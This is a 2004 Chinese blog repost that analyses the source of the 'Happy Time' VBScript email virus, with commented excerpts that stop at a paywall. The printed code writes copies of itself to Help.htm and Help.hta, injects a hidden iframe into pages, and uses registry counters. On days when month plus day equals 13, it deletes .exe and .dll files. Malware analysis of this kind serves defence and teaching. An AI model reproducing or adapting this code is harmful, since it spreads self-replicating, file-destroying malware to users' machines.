欢乐时光病毒原码分析

于 2004-11-28 14:04:00 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 黑客技术 文章标签: function vbscript each shell html express
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrub/article/details/196725
版权
欢乐时光病毒原码分析
作者:swords
出处: ColorWolf:Swords
性质:转载
发布日期:2004-08-15
 
<script language='VBScript'>
Rem I am sorry! happy time
On Error Resume Next
mload                                ----------------------从mload开始罪恶的历程
Sub mload()                                  
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then                        ----------------------如果本程序是网页,就是在Outlook
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:/Help.htm"               ----------------------建立help.htm
Os.Doc = Lhtml()                      ------------调入全部源码
Os.Write()                            ----------------------存储自身到help.htm
Ihtml = "<span style='position:absolute'><Iframe src='C:/Help.htm' width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "Help.vbs") Then    
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)       ---------调用mclose
main                                ----------------进入主程序
Else
Os.Reset()
Os.Path = mPath & "/" & "Help.hta"        ------------建立Help.hta文件
Os.Doc = Lhtml()
Os.write()
Iv mPath, "Help.hta"
End If
End If
End If
Else
main      
End If
End Sub
Sub main()                                      ----------------主程序
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER/Software/"              -----------------写注册表
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:/help.htm") Then
Of.DeleteFile ("C:/help.htm")
End If
Key = CInt(Month(Date) + Day(Date))             ---------------注意:破坏动作
If Key = 13 Then                                ---------------如果月日之和等于13
Od.RemoveAll
Od.Add "exe", "0001"                            ---------------删除.exe.dll文件
Od.Add "dll", "0001"
End If
Cn = Rg(Ks & "Help/Count")                      ------------修改注册表的计数器
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help/Count", Cn + 1
f1 = Rg(Ks & "Help/FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help/FileName", f2
If IsDel(fext) Then
f3 = f2
最低0.47元/天 解锁文章
scrub
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅析欢乐时光(HAPPY TIME)病毒
tchaikov的专栏
05-13 5479
浅析欢乐时光(HAPPY TIME)病毒徐广圻 01-5-11 下午 02:19:25本人是个上网新手,今年四月份左右才开始上网。新手嘛,可不像高手那样,懂得如何使自己的电脑免受网络病毒之害,只使了个瑞星杀毒软件,以为如此一来就万事大吉了。刚开始上网时,简直在五光十色的各网站及信息的海洋中迷了路,东走西瞧,看见感兴趣的网页就保存,遇见有趣的软件即下载
欢乐时光
yanghaizi123的专栏
09-15 228
中毒了,叫“欢乐时光”。是一种早期的dos病毒,它会让系统变慢或打不开文件夹。所有的杀毒软件都不查杀他们。清除办法就是:搜索---全部删除。顺便把Thumbs.db也搜索出来,全部清除。“欢乐时光”最容易软盘传播或者u盘传播。请检查你常用的机器,全部删除。 删除后系统会变快,没有不良影响!!!! desktop.ini 是系统配置文件,如果你用的是茄花园的XP系统,肯定就是自定义的硬盘图表,文件...
[转]“新欢乐时光病毒源代码分析
代码人生
09-21 2422
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() 初始化变量 KJSetDim() 初始化环境 KJCreateMilieu() 感染本地或者共享上与html所在目录 KJLikeIt() 通过vbs感染Outlook邮件模板
欢乐时光病毒源代码分析
05-17
http://irmb.bokee.com/5738840.html
snort原码分析还不错的哦!
09-18
snort原码分析,还不错的哦! Snort作为一个轻量级的网络入侵检测系统,在实际中应用可能会有些力不从心,但如果想了解研究IDS的工作原理,仔细研究一下它的源码到是非常不错.首先对snort做一个概括的评论。 从工作...
java原码补码反码关系解析
08-25
Java原码、补码、反码关系解析 Java语言中,原码、补码、反码是三个重要的概念,它们之间存在着紧密的关系。本文将详细介绍Java原码、补码、反码的关系,并提供实例代码进行解释。 一、原码 原码是指将数字转换...
1_推箱子游戏原码_
09-28
本文将深入解析实现推箱子游戏原码的关键知识点。 1. **数据结构与算法**: - **地图表示**:通常,游戏地图用二维数组或链表来表示,每个元素代表地图上的一个格子,可以是空地、墙壁、箱子、目标点或玩家位置。 ...
欢乐时光病毒专杀或folder.htt 专杀
02-12
欢乐时光病毒专杀 里面有2个杀毒软件 本人用了 好使 不好使 可以联系我 我给杀掉 欢乐时光病毒特征 :folder.htt 等文件夹
欢乐时光病毒查杀专用工具
07-03
瑞星查杀新欢乐时光的专用工具,用于查杀新欢乐时光病毒,测试有效,使用完可以使用everthing软件查出所有病毒文件,一键删除
mul.zip_原码与补码
09-19
标题“mul.zip_原码与补码”涉及到了计算机中处理带符号数的关键概念——原码和补码。这两个术语与二进制数的正负表示有关,尤其在进行算术运算时,如乘法,它们扮演着至关重要的角色。 原码是数字的直接二进制表示...
原码一位乘法器.rar
07-11
在计算机科学中,原码是数字在二进制表示下的标准形式,其中最高位用于表示数字的符号:0代表正,1代表负。原码一位乘法器是一种基本的算术逻辑单元(ALU)设计,用于执行二进制数的一位乘法操作。这个压缩包“原码...
"欢乐时光"代码分析
jjdelphi的专栏
07-20 2581
"欢乐时光"代码分析 转自 ==================== “欢乐时光”其实就是利用了超文本邮件中可以夹带脚本语言的特点而棋高一招的。我们知道,邮件的格式可以有两种:纯文本和超文本。超文本(HTML)功能强大就不用多说了,它可以内嵌数种脚本语言,常见的就是VBScript和JavaScript。“欢乐时光”在超文本中夹带的就是VBS。从源代码中可以看得出来,该作者很可能是
opencv 2.4.9原码分析 sift
最新发布
07-27
### 回答1: SIFT(尺度不变特征变换)是一种在...通过分析SIFT在OpenCV 2.4.9的原码,可以深入了解SIFT算法的实现细节,理解各个函数的作用和调用关系。这有助于对SIFT算法进行深入研究和优化,以满足具体应用需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值